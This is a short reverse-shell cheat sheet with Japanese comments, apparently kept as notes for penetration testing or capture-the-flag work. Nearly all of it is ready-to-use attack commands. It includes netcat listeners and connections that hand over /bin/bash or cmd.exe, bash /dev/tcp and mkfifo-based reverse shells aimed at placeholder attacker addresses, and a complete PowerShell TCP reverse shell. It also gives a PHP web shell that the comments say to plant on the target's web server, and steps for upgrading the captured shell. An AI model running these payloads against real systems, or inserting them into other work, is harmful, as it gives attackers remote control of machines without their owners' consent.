//netcat
nc -lvnp 4444 #linux待ち受け
nc <target IP> 4444 -e /bin/bash #linux接続
nc64.exe -v <attacker IP> 4444 -e cmd.exe #windows接続

//bash
bash -i>& /dev/tcp/<IP>/<port> 0>&1
bash -c 'bash -i>& /dev/tcp/<IP>/<port> 0>&1' #標準のシェルが何かわからないとき
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f #信頼性の高いコマンド

//powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"

//php shell
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<IP>/4444 0>&1'"); #phpファイルにしてターゲットのＷｅｂサーバに配置
python -m http.server 4444 #待ち受け

//pythonでシェルのアップグレード
python3 -c "import pty;pty.spawn('/bin/bash')" #このあとバックグラウンドにおとす
script -qc /bin/bash /dev/null #pythonないとき　このあとバックグラウンド
export TERM=xterm #clearなどが使えるように
stty raw -echo; fg #完了

